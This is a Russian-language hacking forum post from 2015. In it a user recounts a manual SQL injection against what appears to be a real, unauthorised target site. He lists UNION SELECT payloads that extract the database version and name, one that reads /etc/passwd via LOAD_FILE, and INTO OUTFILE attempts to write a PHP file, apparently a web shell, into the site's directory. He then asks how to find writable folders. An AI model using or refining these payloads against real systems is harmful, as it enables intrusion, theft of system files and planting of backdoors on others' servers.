Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #4  
Старый 19.10.2015, 12:51
aldemko
Познающий
Регистрация: 07.09.2015
Сообщений: 36
Провел на форуме:
12627

Репутация: 0
По умолчанию
и еще такой вопрос в продолжение к этому примеру если можно

допустим я дошел до

Код:
+union+select+1,2,3,4,5,6+--+
значения version() и database() методом ручной вставки в каждй столб вместо цифр вставлять или существует закономерность ?

к примеру я изменив запрос на

Код:
с 1,2,version(),4,database(),6  на 1,2,3,4,5,database()+--+   уже не получаю вывод базы на сайте
PS Хотя нет получаю, только выводятся уже в другом месте - нашел в исходном коде

спасибо

PS 2 показывает что

current user is DBA: False

это значит залиться через уязвимость не получиться и искать другие ресурсы ?

PS 3 /threads/426171/page-5#post-3904335 мой первый самостоятельный сайт

Еще пожалуйста по синтаксису помогите

в общем столбцы узнал, базу узнал, права на запись есть

файл passwd читается

Код:
0+UNION+SELECT+1,2,3,4,5,6,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+
нашел предположительные папки на запись

пробую различные состявлять запросы на заливку файла пока не выходит

Код:
0+UNION+SELECT+1,2,3,%27%27,5,6%20INTO%20OUTFILE%20%27/1.php%27,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+

затем я еще раз просмотрел почтовый ящик где мне мистер Br@!ns, давал рекомендации и практические примеры
получился запрос 0+UNION+SELECT+1,2,%27%27,4,5,6,7,8,9,10++into+outfile+%27/home/tesis/docs/123.php%27+--++--+
который кстати как по мне работает - только вот в ответ Can't create/write to file '/home/tesis/docs/123.php' (Errcode: 13)  - но это уже говорит (я так думаю) о том что сам запрос верно составлен

Теперь возникает вопрос, как искать доступные для записи папки ?
я искал софтом uniscan - Но он показал что эта папка доступна для записи - точнее статус 200. но записаться я туда не могу почему то

Подскажите как правильно искать папки для записи
спасибо
или все же запрос не правильно построил

Вопрос все еще пока для меня актуален

как найти папки для записи ? я в ручную уже за..... перебирать, там куча папок с под папками и прочее

спасибо

PS так же не понятки с @@basedir - показывает что домашняя папка /usr/ - но путь не раскрывает

а ошибка на сайте указывает что сайт находится по /home/tesis/

кому верить ?

может изза не верно укзааного пути, я и не могу файл записать а uniscan не врал и папки действительно разрешены для записи
 
Ответить с цитированием